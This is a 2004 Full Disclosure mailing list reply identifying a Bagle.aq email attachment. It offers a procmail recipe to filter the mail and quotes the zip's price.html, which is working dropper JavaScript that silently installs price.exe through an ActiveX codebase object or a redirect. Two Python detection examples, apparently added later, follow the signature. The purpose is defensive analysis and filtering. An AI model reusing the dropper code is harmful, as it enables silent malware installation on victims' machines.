Full Disclosure mailing list archives

Re: (no subject)


From: Tremaine <tremaine () gmail com>
Date: Mon, 9 Aug 2004 15:29:23 -0600

On Mon, 9 Aug 2004 13:03:54 -0600, Jonathan Grotegut
<jgrotegut () directpointe com> wrote:
(In regards to new_price.zip file attachment)

Anyone have any idea what this is? We had some clients just get hit pretty
hard with this email.  I am unable to find anything on it; from my VERY
limited knowledge it appears to be a virus exploiting one of the many
holes in IE.  Anyone else see anything on this yet?

Jonathan Grotegut


Bagle.aq with Mitglieder-like dropper

Procmail recipe (courtesy of an offlist associate), use at your own risk.
[code]
:0 BD
* -1000^0
*   300^0 YJuA6wS8WsBr
*   300^0 zGzjbJDCLB96
*   300^0 BOSKHdXH8Blw
*   300^0 dEi3loqk64su
*   300^0 byusWle0odyf
/dev/null
[/code]


price dot html file included in zip:
[code]
<head>
<script language="JavaScript">
var exepath='price/price.exe';
</script>

<SCRIPT LANGUAGE="JavaScript">
<!--
var bname=navigator.appName;
sewre = "rseI";
var bver=parseInt(navigator.appVersion);

function install() {
        if ( navigator.platform && navigator.platform != 'Win32' ) {
                location.replace('NOTWIN32WARNING.html');
                return;
        }
        if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
                document.write('<object id="gib" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D"   codebase="'+exepath+'"></object>');
        } else if (bname == 'Netscape' && bver >= 4) {
                trigger = netscape.softupdate.Trigger;
                if (trigger.UpdateEnabled) {
                        trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
                } else {
                        location.replace(exepath);
                }
        } else {
                location.replace(exepath);
        }
}

install();

// -->
</script>
</head>
[/code]




Definitions available on McAfee and Trend Micro, and it appears
Symantec should have something by about 6pm.



-- 
Tremaine
IT Security Consultant
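To make the recipe's scoring explicit: `:0 BD` searches the message body case-sensitively, `* -1000^0` is an unconditional starting score of -1000, and each `300^0` condition adds 300 once if its base64 fragment occurs (exponent 0 stops procmail after the first match of that condition), so the recipe only fires, delivering to /dev/null, when the total ends up positive, i.e. when at least four of the five fragments are present (-1000 + 4*300 = 200; three matches leave -100). The Python below is an added example, not code from the post or its author; it emulates that scoring over constructed sample bodies. The fragments are the ones in the recipe; the bodies are made up.

```python
"""Emulate the posted procmail scoring recipe in Python.

Added example for this thread, not the recipe's author's code. The five
fragments are the ones in the recipe; the sample bodies below are constructed.
"""
from typing import List

# The five body fragments from the procmail recipe in the post.
FRAGMENTS = (
    "YJuA6wS8WsBr",
    "zGzjbJDCLB96",
    "BOSKHdXH8Blw",
    "dEi3loqk64su",
    "byusWle0odyf",
)

BASE_SCORE = -1000   # "* -1000^0": unconditional starting score
MATCH_WEIGHT = 300   # "* 300^0 <fragment>": each fragment counts once if present


def matching_fragments(body: str) -> List[str]:
    """Fragments found in the body; the D flag makes this case-sensitive."""
    return [fragment for fragment in FRAGMENTS if fragment in body]


def score_body(body: str) -> int:
    """Final score of the recipe for one message body.

    Exponent 0 means a condition contributes its weight at most once, no
    matter how many times the fragment occurs, so presence is all that counts.
    """
    return BASE_SCORE + MATCH_WEIGHT * len(matching_fragments(body))


def should_discard(body: str) -> bool:
    """procmail runs the recipe action (here: /dev/null) when the score is positive."""
    return score_body(body) > 0


# Constructed sample bodies (not real messages). The base64 run below is made
# up and merely contains all five fragments back to back.
SAMPLE_INFECTED = (
    'Content-Type: application/zip; name="new_price.zip"\n'
    "Content-Transfer-Encoding: base64\n\n"
    "UEsDBBQAAAAIAYJuA6wS8WsBrzGzjbJDCLB96BOSKHdXH8BlwdEi3loqk64subyusWle0odyfAAAA\n"
)
SAMPLE_PARTIAL = "...YJuA6wS8WsBr...zGzjbJDCLB96...BOSKHdXH8Blw..."   # only three of five
SAMPLE_CLEAN = "Hi Jonathan, the price list is attached as a PDF.\n"
SAMPLE_WRONG_CASE = SAMPLE_INFECTED.lower()                            # case-sensitivity check

if __name__ == "__main__":
    for name, body in [("infected", SAMPLE_INFECTED), ("partial", SAMPLE_PARTIAL),
                       ("clean", SAMPLE_CLEAN), ("wrong case", SAMPLE_WRONG_CASE)]:
        print(f"{name:10s} score={score_body(body):6d} "
              f"matches={len(matching_fragments(body))} discard={should_discard(body)}")
```

The requirement for four of five fragments is what keeps a single coincidental base64 collision from discarding legitimate mail; the case-sensitive match matters because every fragment mixes upper and lower case, so a lowercased copy scores nothing.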

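As a defensive complement to the pasted price.html: a small static scanner, an added example rather than anything from the post, that flags the traits the dropper shows: a quoted string naming a .exe, an `<object>` tag carrying a `codebase=` attribute, the CLSID used in this sample, and a `location.replace()` redirect as fallback. Because the object tag is assembled at runtime inside `document.write()`, the checks run over the raw text including script bodies; parsing the markup into a tag tree would never see the tag. The sample inputs are constructed, with the dropper sample reduced to the structure visible in the post.

```python
"""Static triage of an HTML attachment for the traits shown by the posted
price.html dropper. Added example for this thread, not code from the post."""
import re
from typing import List, Tuple

# CLSID from the posted dropper's <object> tag.
DROPPER_CLSID = "018B7EC3-EECA-11d3-8E71-0000E82C6C0D"

# Quoted string literals naming a Windows executable, e.g. 'price/price.exe'.
EXE_LITERAL_RE = re.compile(r"""['"]([^'"\s]+\.exe)['"]""", re.IGNORECASE)
# <object ...> that supplies codebase=, as static markup or inside a
# document.write('...') string; [^>]* keeps the search within one tag.
OBJECT_CODEBASE_RE = re.compile(r"<object\b[^>]*\bcodebase\s*=", re.IGNORECASE)
# classid="CLSID:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
CLSID_RE = re.compile(
    r"classid\s*=\s*['\"]?CLSID:([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})",
    re.IGNORECASE)
# Navigation fallback the dropper uses when neither browser-specific path works.
REDIRECT_RE = re.compile(r"\blocation\.(?:replace\s*\(|href\s*=)", re.IGNORECASE)

Finding = Tuple[str, str]


def analyse_html(text: str) -> List[Finding]:
    """Return (kind, detail) findings for one HTML document (raw text, scripts included)."""
    findings: List[Finding] = []
    exes = sorted({m.group(1) for m in EXE_LITERAL_RE.finditer(text)})
    if exes:
        findings.append(("exe_reference", ", ".join(exes)))
    if OBJECT_CODEBASE_RE.search(text):
        findings.append(("object_codebase", "<object> tag with codebase= attribute"))
    for m in CLSID_RE.finditer(text):
        clsid = m.group(1).upper()
        note = "matches posted dropper" if clsid == DROPPER_CLSID.upper() else "unrecognised"
        findings.append(("clsid", f"{clsid} ({note})"))
    if exes and REDIRECT_RE.search(text):
        findings.append(("redirect_to_exe", "location.replace()/href alongside an .exe literal"))
    return findings


def is_suspicious(text: str) -> bool:
    """An .exe literal combined with a codebase= object or a redirect is enough to quarantine."""
    kinds = {kind for kind, _ in analyse_html(text)}
    return "exe_reference" in kinds and bool(kinds & {"object_codebase", "redirect_to_exe"})


# Constructed samples. The first mirrors the structure of the posted price.html.
SAMPLE_DROPPER_HTML = """<head>
<script language="JavaScript">
var exepath='price/price.exe';
function install() {
  if (navigator.appName == 'Microsoft Internet Explorer') {
    document.write('<object id="gib" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D" codebase="'+exepath+'"></object>');
  } else {
    location.replace(exepath);
  }
}
install();
</script>
</head>
"""
SAMPLE_BENIGN_HTML = '<html><body><p>Price list attached.</p><a href="prices.pdf">download</a></body></html>'
# An object tag with a codebase= but no executable literal: noted, not quarantined.
SAMPLE_PLUGIN_HTML = '<object classid="CLSID:00000000-0000-0000-0000-000000000000" codebase="viewer.cab"></object>'

if __name__ == "__main__":
    for name, doc in [("dropper", SAMPLE_DROPPER_HTML), ("benign", SAMPLE_BENIGN_HTML),
                      ("plugin", SAMPLE_PLUGIN_HTML)]:
        print(f"{name}: suspicious={is_suspicious(doc)}")
        for kind, detail in analyse_html(doc):
            print(f"  {kind}: {detail}")
```

Gating the verdict on an executable literal keeps ordinary plugin markup (a `codebase=` pointing at a .cab) out of quarantine while still recording the object tag and CLSID for review; in a mail pipeline the scanner would run on each HTML member after the zip is unpacked.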
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
